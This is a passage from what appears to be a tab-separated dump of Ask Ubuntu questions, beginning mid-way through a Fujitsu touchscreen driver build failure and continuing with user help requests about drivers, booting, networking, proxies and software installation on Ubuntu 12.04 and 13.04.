-werror=implicit-function-declaration ] /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:182:3 : error : implicit declaration of function ‘err’ [ -werror=implicit-function-declaration ] /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c : in function ‘usb_u810_tablet_probe’ : /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:246:6 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:253:6 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:263:6 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:270:6 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:277:6 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:302:5 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:358:5 : error : called object ‘err’ is not a function /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.c:366:5 : error : called object ‘err’ is not a function cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/fujitsu_usb_touchscreen.o ] error 1 make [ 1 ] : *** [ _module_/home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-30-generic' make : *** [ fujitsu_usb_touchscreen.ko ] error 2 archelon @ ingelrayok : ~/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406 $ i should also note that make completes without errors on my other computer , a toshiba satellite r10 running kubuntu 12.04 ; this machine also has a ( fully operational ) tablet with stylus . ( the toshiba 's tablet is a wacom with active digitizer as opposed to the fujitsu 's usb resistive touchscreen ) . so , probably i 'm just missing some package or other -- -i have n't compiled anything for years and never was particularly good at it . perhaps you can sort me out . update : i 've replaced 13.04 with 12.04 lts , retaining my /home partition , and now the package compiles : make completes without errors . however , make install does not . [ to be precise , i ran checkinstall ( or , rather , sudo checkinstall ) , which calls make install , because as far as i can tell the former is a simple upgrade of the latter ( at least for my purposes ) , providing integration with the package management system . ] initially , it failed with the following error : make : execvp : /etc/init.d/fujitsu_touchscreen : permission denied make : *** [ install ] error 127 after some research , i tried using chmod +x on the affected file : $ sudo chmod +x /etc/init.d/fujitsu_touchscreen running sudo checkinstall again , the permission error is seen to have been resolved ; it gets much further along before failing again . the log which it offers to print to stdout shows a dpkg error , as follows : dpkg : error processing /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/cybergene-fujitsu-usb-touchscreen-112fdb75b406_amd64.deb ( -- install ) : unable to create `/sys/module/fujitsu/usb/touchscreen/parameters/touch_maxy.dpkg-new ' ( while processing `/sys/module/fujitsu/usb/touchscreen/parameters/touch_maxy ' ) : no such file or directory and , indeed , while there is /sys/module/fujitsu_usb_touchscreen/parameters/touch_maxy , there is no /sys/module/fujitsu/usb/touchscreen/parameters/touch_maxy ; apparently a typographical error has been introduced somewhere . thus i must find and fix it . but unfortunately i have very little idea where to look other than the install ; section of the makefile , and it 's not in there . ( i understand there is sometimes an install file instead ? but there is n't in this case . ) ... help ? ( since this is an entirely distinct issue , i 've asked a separate question : `make install` fails apparently due to typo , but not in makefile : how to find and fix ? ) update 2013-10-18 after reinstalling kubuntu 12.04 again , this time recreating the /home partition ( which , again , had been generated during an install of 13.04 ) , i can no longer reproduce the strange error immediately above . i am still curious to know how the underscores got changed to slashes , but it looks as though nobody has any idea . it is perhaps also of interest to note that while i have still not successfully run checkinstall against this package , i have done make install ; it requires the executabilization of /etc/init.d/fujitsu_touchscreen and the installation of hal , and the gui freezes shortly after installation completes , and there is no particular new functionality afterwards that i have noticed , and the system can no longer resume from being suspended . i have subsequently lost interest in fujitsu-usb-touchscreen since it appears the magick rotation package can provide everything i was looking for . it does not , however , work 'out-of-the-box ' ; i have filed a bug report which also documents the inelegant workaround i discovered .
345640	what mount point should i use ?	i just installed ubuntu twice and i get a grub error . i think it 's because of the mount point . since i put it at the root of the hdd . where do i put it ? is it / or /boot ? or am i completely wrong ?
345642	latest boost 1.54 and memory errors	i downloaded , built and installed the boost library version 1.54 with kernel version 3.2.0-53-generic and everything works fine . however , i get memory errors while running some of the log examples e.g . tutorial_file.cpp running valgrind -- show-reachable=yes -- dsymutil=yes -- track-origins=yes ./tutorial_file i get a bunch of memory errors and this is the output at the top : ==2792== memcheck , a memory error detector ==2792== copyright ( c ) 2002-2011 , and gnu gpl 'd , by julian seward et al . ==2792== using valgrind-3.7.0 and libvex ; rerun with -h for copyright info ==2792== command : ./tutorial_file ==2792== ==2792== invalid read of size 8 ==2792== at 0x6bc2e18 : wcscmp ( wcscmp.s:479 ) ==2792== by 0x645e113 : std : :moneypunct < wchar_t , false > : :~moneypunct ( ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x645e198 : std : :moneypunct < wchar_t , false > : :~moneypunct ( ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x6452a79 : std : :locale : :_impl : :~_impl ( ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x6452c4c : std : :locale : :~locale ( ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x6b5cd1c : __cxa_finalize ( cxa_finalize.c:56 ) ==2792== by 0x6eeffe5 : ? ? ? ( in /home/bravegag/downloads/boost_1_54_0/bin.v2/libs/filesystem/build/gcc-4.6/debug/threading-multi/libboost_filesystem.so.1.54.0 ) ==2792== by 0x6efc640 : ? ? ? ( in /home/bravegag/downloads/boost_1_54_0/bin.v2/libs/filesystem/build/gcc-4.6/debug/threading-multi/libboost_filesystem.so.1.54.0 ) ==2792== by 0x6b5c900 : __run_exit_handlers ( exit.c:78 ) ==2792== by 0x6b5c984 : exit ( exit.c:100 ) ==2792== by 0x6b42773 : ( below main ) ( libc-start.c:258 ) ==2792== address 0x760e358 is 0 bytes after a block of size 8 alloc'd ==2792== at 0x4c2ac27 : operator new [ ] ( unsigned long ) ( in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so ) ==2792== by 0x645dded : std : :moneypunct < wchar_t , false > : :_m_initialize_moneypunct ( __locale_struct* , char const* ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x645511e : std : :locale : :_impl : :_impl ( char const* , unsigned long ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x645565e : std : :locale : :locale ( char const* ) ( in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.16 ) ==2792== by 0x6efa0e0 : boost : :filesystem : :path : :codecvt ( ) ( path.cpp:911 ) ==2792== by 0x5d226c0 : boost : :enable_if < boost : :filesystem : :path_traits : :is_pathable < boost : :decay < std : :string > : :type > , boost : :filesystem : :path & > : :type boost : :filesystem : :path : :operator= < std : :string > ( std : :string const & ) ( path.hpp:202 ) ==2792== by 0x5d1851b : boost : :log : :v2_mt_posix : :sinks : :text_file_backend : :set_file_name_pattern_internal ( boost : :filesystem : :path const & ) ( text_file_backend.cpp:1188 ) ==2792== by 0x5d17e0b : boost : :log : :v2_mt_posix : :sinks : :text_file_backend : :construct ( boost : :filesystem : :path const & , std : :_ios_openmode , unsigned long , boost : :log : :v2_mt_posix : :aux : :light_function < bool ( ) ( ) > const & , bool ) ( text_file_backend.cpp:1100 ) and now the ultimate question , would this be a boost or an ubuntu issue ? i have an application at work that crashes with segmentation fault due this same issues ( it crashes when invoking logging : :add_file_log ) i wanted to isolate the problem in a separate system with exact configuration and using only boost examples and it is reproducible .
345644	why are broadcom such an issue for ubuntu ?	is there a spesific reason why there are so many broadcom problems here on ask ubuntu , and on any other ubuntu forum ? what 's the problem with broadcom ?
345646	`` sorry , installation of this driver failed . please have a look at log files for details ''	i just installed ubuntu and love it so much , its so fast now . but i have a problem connecting to the internet . i checked and saw i have to install the driver broadcom sta wireless driver but every time i do try to install it it says : sorry , installation of this driver failed . please have a look at the log files for details : /var/log/jockey.log i went to terminal and copy and pasted the log file name . and when i did it said i have no permission to access this file . i checked on the forums that i have to be on a wired connection . so i plugged my laptop into my router and i got internet then tried to install the driver again . and it was loading then when it got to the end the same message popped up . also i have one of those little usb router things you plug into the computer and it gives you internet i have been using that but its to slow . so i want to use the one in my computer but cant . ive been trying all day to get it to work please please help me . also im runnung 12.04 also i tried the command : sudo modprobe wl and when i type that command in it says : fatal : module wl not found since , i am so new at this all ubuntu thing can u explain to me , how to fix this please ?
345648	how can i change the white background in the file manager ?	i would like to change the white background of my file manager . ( i really searched everywhere and tried a lot of things . ) i was trying to change css files of my theme ( gtk2 & gtk3 folders ) and i tried others themes too , but no luck so far . i wish to change the `` eye-killing '' white to grey , in windows you could just change that easily with the theme changer . in xubuntu ( i 'm using xfce ) , this seems impossible.i switched back to ubuntu , but there i could n't change this , even theyâre using same principles . could anyone give me a hint where i change this annoying white background ? thanks in advance .
345649	hide windows 7 partition from ubuntu 12.04 usb	i am so hopelessly tired of following posts on all forums including this one . i only want my windows 7 partition to be invisible from my ubuntu 12.04 which i install and run from a usb flash drive . i tried all those fstab posts and nothing works . everything needs so many commands . can someone help me to do this task ? thanks a billion .
345650	12.10 does n't start up	i recently installed ubuntu 12.10 via wubi . when i start up my computer everything works fine until i login . my desktop items are shown but that is it , and i ca n't start any programs . does anybody have any idea for how to fix this ? also , i get the same problem in other accounts .
345651	change ownership when owned have space in name ?	i run into a very stupid problem , trying to migrate files into new xampp server and having hard time until i realised : the installation from package created username with space in it . so now i have username `` mysql - '' and group `` mysql '' which control databases and i need to change ownership on 30 database and more than 300 tables in that folder , but the only way i know is manually change one by one folder of database . how can i bulk change ownership of all folders and files via terminal or somehow if user have space in name ?
345653	how to bypass sudo when it asks for password & when you do n't have a password to begin with ?	i removed my password on my login account ( i 'm not admin ) . when i go to terminal to install something using sudo , it asks for a password . not the admin 's password but my account 's password but i do n't have a password . how do i bypass this without me adding a password to my account ?
345658	japanese voice for espeak	what do i need to download to have espeak speak in japanese ? if i ca n't do it in espeak , is there a similar program i can run ? anything compatible with java or will run in the terminal will be excellent .
345660	text file processing : the first line having a variable value bigger than a specific number	i have a very huge text file , and i want to know how can i find the first line in which the value of a variable is bigger than 1000 ? assuming that the variable and its value have only one space in between like this : abcd 24
345661	lexmark s405 wifi - printer installed but wo n't print	i went to lexmark and downloaded the 64bit driver for my ubuntu 12.04 64bit . i have followed 4 different guides so far . they all say pretty much the same thing . add the printer , install the driver , and it works ! for me , i add the printer , install the driver , and it says processing for about 6 minutes then stopped . i 've tried it the wizard way , that installs the drivers automatically , and the more hands on approach . there are 2 driver versions and i have tried them both . i can print from other devices ; so i know it 's something to do with this one pc ... any ideas ? edit : i ran the troubleshooting wizard . i 've attached the diagnostic log . tl ; dr printer came up in ready status and available to print , but nothing printed . wizard 's diagnosis i followed this guide under the network printer link . i 'll attach a log of the output for that as well . the /usr/lib/cups/backend/snmp 192.168.0.8 came up with nothing and both avahi-browse commands did not show the printer . if that helps ... command prompt diagnosis
345662	the wireless internet does not work and the internet driver does not update	the wireless internet does not work and the internet driver does not update . i have been trying for over 3 hours .
345667	how to navigate through directories named with non-latin characters ?	i just do n't know if it 's possible and how to cd for example in a dir that is not named with latin characters . example : $ cd άλφα or $ cd альфа update : in a terminal it is ok , but in a cli environment not .
345672	file hplip-3.13.9	install two week ago : ubuntu 13.04 with gnome and cairo-dock had message to update hplip 3.13.3 to hplip 3.13.9 install new hplip from hp site using automatic installer , followed instructions . the automatic installer put on the desktop hplip3.13.9 run and at the end of installation a second file was on the desktop . this contains 46,5 mo can i send to the garbage the run file and put the other file at the right place without affecting hplip and the printer ?
345674	pure-ftpd symlink wo n't work	okay , so i 'm using ubuntu 12.04 lts and i installed pure-ftpd i made a user and group for it when i log in with a ftp client it puts me in /home/group/user i want to have access to my storage drive from there so i put a symlink in the folder that points to /media/store and it shows up on the ftp , but , it wo n't let me follow it . the /media/store drive is formated in ntfs so i can not change permissions on it . etc/pure-ftpd/conf has : altlog clf : / chrooteveryone yes daemonize yes fscharset utf-8 maxclientsnumber 50 maxclientsperip 2 minuid 1000 noanonymous yes pamauthentication no puredb /etc/pure-ftpd/pureftpd.pdb trustedgid 1001 unixauthentication no my pureftpd.passwd file looks almost like user : x:1001:1001 : ://usr/group/user/ : : : : : : : : : : : : my etc/default/pure-ftpd-common looks like # configuration for pure-ftpd # ( this file is sourced by /bin/sh , edit accordingly ) # standalone_or_inetd # valid values are `` standalone '' and `` inetd '' . # any change here overrides the setting in debconf . standalone_or_inetd=standalone # virtualchroot : # whether to use binary with virtualchroot support # valid values are `` true '' or `` false '' # any change here overrides the setting in debconf . virtualchroot=true # uploadscript : if this is set and the daemon is run in standalone mode , # pure-uploadscript will also be run to spawn the program given below # for handling uploads . see /usr/share/doc/pure-ftpd/readme.gz or # pure-uploadscript ( 8 ) # example : uploadscript=/usr/local/sbin/uploadhandler.pl uploadscript= # if set , pure-uploadscript will spawn $ uploadscript running as the # given uid and gid uploaduid= uploadgid= i 've tried different configurations but ca n't get out of the login folder and into the storage drive i 'm probably just missing something simple .
345680	i installed ubuntu 13.04 ... but windows is still on my computer	whenever i start my computer up i am prompted to choose between windows and linux instead of it automatically going to linux . i guess i screwed up somewhere in the installation process but how can i reverse this so windows is 100 % gone from my life ?
345689	mv file to smb failed , space still used , file missing	i attempted to mv a 14gb file from my local filesystem to a smb share on my windows system . the mv failed and , after checking ls and df , the file does n't appear in the index , yet the space is still taken . i do n't really care about this file , as it was only a backup tar that can be recreated , so my goal is to get rid of the file entirely . lsof|grep did not return anything for the file . extundelete would n't install properly , so i 'm running out of ideas . i 'm limited to a 60gb hdd on a laptop with only 30 % left so i do n't have many options as far as extracting lost files from the filesystem . i just want to get rid of the file now ( it was in the home path ~/ ) . any thoughts ?
345690	ubuntu12.04 disk write delays much	here is my dd test : 10240+0 records in 10240+0 records out 83886080 bytes ( 84 mb ) copied , 0.136335 s , 615 mb/s previously i used a hdd , now using the ssd . in the python idle or geany , i found that i must to close the applicaton to let data write through disk . cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=7df3ec50-b5d6-4d40-afec-d996671a5b26 / ext4 discard , noatime , nodiratime , errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=64fe8598-9ccd-4e95-b279-0bc78c4d6999 none swap sw 0 0 tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0
345691	videos look strange on ubuntu 12.04	i 've recently installed ubuntu 12.04 to replace windows xp on my dad 's computer , as he kept having trouble with an automatic update memory leak problem that i simply could not solve . ubuntu works great for his needs , except he has a lot of video files of old tv shows that he watches . i noticed that the color looks really off on the videos on ubuntu , almost as if its way too saturated . i tried downloading vlc and it still looks the same . the video hardware is an intel integrated chipset which i understand has drivers built into ubuntu . photos , desktop backgrounds , websites , etc all look normal . it is just the videos that look strange . ( avi files played from an external drive , the same files he played on windows ) . is there something else i should be trying or some video processing setting i am missing ?
345692	bootable usb drive and iso images	i 've some question regarding bootable pendrive and iso . how to make a normal isoimage ( just containing folders ) or usb boot-able , if one wants to do it manually , how to do it ? what is difference in bootsector of normal pendrive and a bootable pendrive ? what if i have ubuntu iso ( not a live-cd ) with all it 's content , how to make it bootable ?
345694	installing ubuntu 12.04 on virtualbox4.2.18 causes the vm to crash . this has happened twice already	i am installing under windows 8 64-bit . installed oracle virtualbox 4.2.18 . downloaded ubuntu 12.04 lts iso . created a new vm and tried to start from the iso file to install ubuntu to the vm . process of downloading third party software packages and installation runs a few hours and then apparently everything has been installed . it asks for a reboot when i do that it crashes . next time around it asks if ubuntu should be reinstalled . i have gone through this process twice already with no success . please help if you have a solution .
345697	ubuntu login black screen after postgis install	i just built a new computer running an asus p8z77-v lk motherboard with no graphics card . can boot into ubuntu , run a bunch of the usual programs ( chrome , etc ) no problem . however , when i install postgis through the ubuntugis/ppa , things start to go downhill . postgis actually works fine , but the problem comes when i shut down the computer . when i boot back up , the screen flashes black a few times , i briefly see a login terminal prompt , and then i 'm just faced with a black screen and a blinking white cursor ( where there should be the usual ubuntu login screen ) . strangely , typing in my password and hitting enter ( although nothing shows up on the screen ) logs me in and brings up the ubuntu desktop . however , the performance of some key programs is negatively affected . for example , the tabs in chrome get weirdly faded and occasionally the web pages will just freak out ( tons of small multicolored lines across the screen , big black bars across parts of the screen , etc ) , especially when i switch tabs or scroll . i 'm able to totally eliminate this issue ( can boot into normal login screen and no chrome freakouts ) by uninstalling postgis and autoremoving the following packages : sudo apt-get -y remove qgis postgresql postgis postgresql-9.1-postgis postgresql-client reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libgraphicsmagick3 postgresql-9.1 python-numpy libxine1-x libproj0 odbcinst1debian2 python-qgis-common libqt4-test libqt4-designer libqwt5-qt4 libogdi3.2 libspatialindex1 python-central libcoin60 libavdevice53 odbcinst liblapack3gf libxine1-plugins libmysqlclient18 python-qgis libarmadillo2 libdap11 libgdal1-1.7.0 libqt4-help python-qt4 libgdal1 python-sip libepsilon0 qgis-providers libgif4 libxerces-c28 libopenthreads14 libhdf5-serial-1.8.4 libgeos-c1 gdal-bin postgresql-common proj-data libxine1-console libfreexl1 qgis-common postgresql-client-9.1 libqtassistantclient4 libspatialite3 libzip2 libblas3gf proj-bin libxine1-misc-plugins libgeos-3.2.2 libgeos-3.3.8 python-gdal postgresql-client-common libpq5 libosgearth1 libqgis1.8.0 libodbc1 libgsl0ldbl libqt4-scripttools libqtwebkit4 libhdf4-0-alt qgis-plugin-globe-common qgis-providers-common mysql-common libopenscenegraph80 libdapclient3 libxine1-bin libxine1-ffmpeg libnetcdf6 libxine1 so ... how do i run postgis on my machine without these bad side-effects ?
345699	how to send audio through hdmi to amplifier ( not a tv ) ?	i have an hdmi cable connected to an amplifier ( not a tv ) , and i ca n't figure out for the life of me how to get ubuntu to output sound through the cable . it works fine on windows , so i know it is n't a hardware issue . i 've found plenty of guides on connecting to a tv , and i have done that and it works ( on a tv ) , but connecting to an amplifier does n't work . because of this , i also know that it has nothing to do with anything being muted . the tv guides that i have found often also deal specifically with sound issues , but sound works fine when i connect to a tv ( but again , not with my amplifier ) . my problem is connecting hdmi sound to an amplifier ( again , not a tv ) . i 've checked the alsa wiki , and it also assumes hdmi is being used for a tv , but i have still tried their instructions to no avail . i have also tried the instructions on the arch wiki and they have failed for the same reason ( arch usually has very useful guides for most areas ) . when i type in terminal : aplay -d plughw:0,3 /usr/share/sounds/alsa/front_center.wav i get no error messages but also no sound . interface : i3-wm ( not unity , graphical instructions will not work ) sound `` tool '' : alsa-utils ( i do not use pulseaudio nor do i want to ) os : ubuntu 12.04.3 server computer : acer aspire v3-771g-9823 if you give me an answer that involves graphical instructions , it is very likely that it will do me absolutely no good .
345703	ethernet and wireless not working in ubuntu 12.04	i installed ubuntu 12.04 on my computer using wubi recently , and i 'm unable to connect to the internet using either ethernet or wireless . at first , it was showing these errors while starting up : error : firmware file `` b43/ucode.fu '' not found error : firmware file `` b43-open/ucode15.fu '' not found error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver i was able to install the b43 driver and now it no longer shows those errors starting up and displays `` enable wireless '' when i click on the network icon , but neither ethernet or wireless work still . i looked through some previous threads about this , but was unable to fix this problem using those solutions . please help ! result of ifconfig : eth0 link encap : ethernet hwaddr 00:23:8b : d3:0e:8d inet6 addr : fe80 : :223:8bff : fed3 : e8d/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:2 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:168 ( 168.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:200 errors:0 dropped:0 overruns:0 frame:0 tx packets:200 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:16072 ( 16.0 kb ) tx bytes:16072 ( 16.0 kb ) wlan0 link encap : ethernet hwaddr 00:25:56:40:72 : d9 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) result of lspci : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.6 signal processing controller : intel corporation 82801i ( ich9 family ) thermal subsystem ( rev 03 ) 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) result of : cat /etc/network/interfaces : auto lo iface lo inet loopback
345704	unetbootin : 13.04_live vs. 13.04_hdmedia vs. 13.04_netinstall ?	i have the ubuntu 13.04 desktop-i386 downloaded but there are multiple choices in unetbootin for the distribution and i do n't know what to choose .
345706	how can i make a compiz window rule for the terminator terminal ?	how can i make a compiz window rule for the terminator terminal ? if you read this post , you will see that terminals will resize uncontrollable . i am using the terminator terminal and need to set a window rule so it will stop resizing when i open it . i installed compiz but i ca n't find instructions on how to set up a rule . bill from the linked thread so he was able to solve this problem with window rules which has inspired to do the same except i have no idea on what to do . i read a few of the post on compiz and window rule but one was close and the others were n't helpful .
345712	installed strom on ubuntu 12.04 lts	i want to set up storm 'open source ' on ubuntu 12.04 lts . i tried the following method but failed : unpack storm release , and put the unpacked bin/directory on your path and make sure the bin/storm script is executable .
345713	ubuntu does not shut down	my issue is that ubuntu 13.04 ( unity ) is unable to shutdown and simply hangs on a shutdown screen . details below : so i 've been running ubuntu 13.04 ( i386 ) on my laptop for a few months and yesterday decided to install gnome-shell from software centre . after a number of problems with compiz and unity , a broken package manager , grub being replaced with a blue theme and the gnome desktop not actually working , i fixed most of these problems by removing gnome-shell and the main components that installed with it . ( grub is still blue after reinstalling it , and the ubuntu splash screen does n't appear , but that does n't bother me really ) . when i choose shutdown ( or use terminal commands shutdown -p now or poweroff ) the desktop disappears and a blue screen ( what i think is a gnome 3 wallpaper ) appears . after hitting esc , a black screen appears with the text /etc/init.d/.depend.stop : no such file or directory acpid : exiting then i wait . the shutdown process was 4-5 seconds before yesterday but now lasts until i hold down the power button there is also some text above that , however it does n't say anything of value except runlevel=0 what i infer ( as a noob , that is ) from this is that the gnome installation affected a file ( /etc/init.d/.depend.stop ) that runs when the computer shuts down , and now it is unable to power off . i 'd like to know how to replace this file with one that will work and hopefully allow the computer to complete the process . any help is appreciated and i can provide further information if you need it . also , i found a similar question at the system does not go down but that situation was 12.04 and the answer did not work for me , with terminal returning install : can not stat â/dev/fd/63â : no such file or directory
345715	ubuntu 13.04 release cycle ?	what do you mean by support ? do you mean technical support or do you mean you stop fixing problems when the 9 months is up ?
345717	how to download ubuntu sdk documentations for offline reading ?	rather than saving each and every page separately ( coz that would be a tedious job ) i want to know if there is a single pdf file or a file in any other format of those huge documentations that i could download in single click ? i know there are always some people out there who do such jobs . i do n't have permanent internet connection nor never-ending free time to go online every time , that 's why i 'll prefer offline documentation .
345718	installing ubuntu 12.04 w/ usb issue	motherboard : asrock z77 extreme4 atx lga1155 motherboard video card : sapphire radeon hd 7970 3gb os : windows 7 64 bit hi , i 'm a windows user trying to convert to linux . but there were problems when i try to install ubuntu . so i found out that i installed windows 7 from the bios way and i know that i have to install it the same way as windows which i have no idea about . i created the boot-able usb drive as listed in the instructions on the main ubuntu website from the 12.04 desktop amd64 which is the 64 bit version . i turned off my computer and turned it back on , pressed f11 , and it shows me that i can boot from 4 places . one of them was the usb and one of them said something about the uefi usb . i tried the uefi but when i got to the screen where it said install ubuntu , 5 seconds later , it just turned into a black screen for like 10 minutes and just stayed there . then i tried the usb option , booting from it , it asked me if i wanted to run it or install it . i chose install but after the initializing log , it froze at another initializing log : any help will be appreciated . thanks .
345719	ubuntu and windows 8 without windows 7	i had my laptop pre installed with windows 7 and then i installed ubuntu , later upgraded to windows 8 . that was ok. now , i want to uninstall ubuntu 12.04 and install 12.04.3 ( yes , i want to uninstall and install . i have problems with the present ubuntu ) . can i install ubuntu 12.04.3 through wubi ( as i did n't get my laptop with windows 8 pre installed ) ? some of my friends suggested me to install windows 7 in windows 8 , then install ubuntu in windows 7 and after that remove windows 7 . do i really need to do all this ? in either case how do i uninstall ubuntu ? there are many questions of this sort in askubuntu.com but , my system does n't show ubuntu as one of the programs installed and all the solutions i have seen , say to directly uninstall using control panel . finally , i want to have ubuntu up and running alongside windows 8
345720	what does the message `` publishing has been disabled for this archive '' mean for a ppa on launchpad ?	on a launchpad ppa page such as this one , what does the message `` publishing has been disabled for this archive '' mean ?
345723	error while installing libreoffice in ubuntu from ubuntu software centre	the following packages have unmet dependencies : libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:4.0.3-0ubuntu1~quantal1 is to be installed depends : libreoffice-base-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:4.0.3-0ubuntu1~quantal1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is to be installed how can i resolve this error ... ?
345724	run sickbeard behind nginx	i 've been at this for so long now , trying to get my sickbeard to run behind nginx and having no luck at all , excuse my noobness . here 's what i 've tried . i have sickbeard installed in [ b ] /opt/sickbeard [ /b ] inside the config.ini file within the sicbeard directory , i have edited to web_root variable to equal /opt/sickbeard in the /etc/nginx/nginx.conf file , this is what i have : http { server { listen 80 ; server_name http : //server.example.com ; location /sickbeard { proxy_pass http : //server.example.com:8081/opt/sickbeard ; } } } this just does n't work even the slightest , what am i doing wrong ? shannon
345725	how to setup manual socks proxy ?	i am looking to setup a local socks proxy so that i am able to connect to remote hosts via another ssh client that i 've recently found . i usually use putty but have found a new one that seems to better suit my needs although it does n't support built in proxy settings . some of the hosts i connect to via ssh are behind socks4 and socks5 proxies , usually within putty all i need to do is set something like the following : due to not having 10 reputation points , i was unable to post a screenshot directly , so please follow this link : proxy settings image so essentially the connection takes place like : my machine -- > proxy host ( 1.2.3.4:1080 in this case ) -- > remote machine on port 22 ( i 've used 1.2.3.4 to mask any sensitive information that people might not like shared ) . i am wondering , is it possible for me to create a connection to the remote machine via the proxy server ( middle machine , 1.2.3.4 ) so that i can point my new ssh client to localhost:7777 or whatever port i decide to link it with ? i read up a bit on tsocks or using the ssh command but was unsure as to how to go about it . anyone who can give me some guidance with this would be muchly appreciated . what i 'm looking to do is setup a command ( preferably the ssh -d type command to put it in my pre-connection section in my new ssh client , then have another command in the post-connection section which closes the socks tunnel once i close my connection in the new ssh client . cheers , kane .
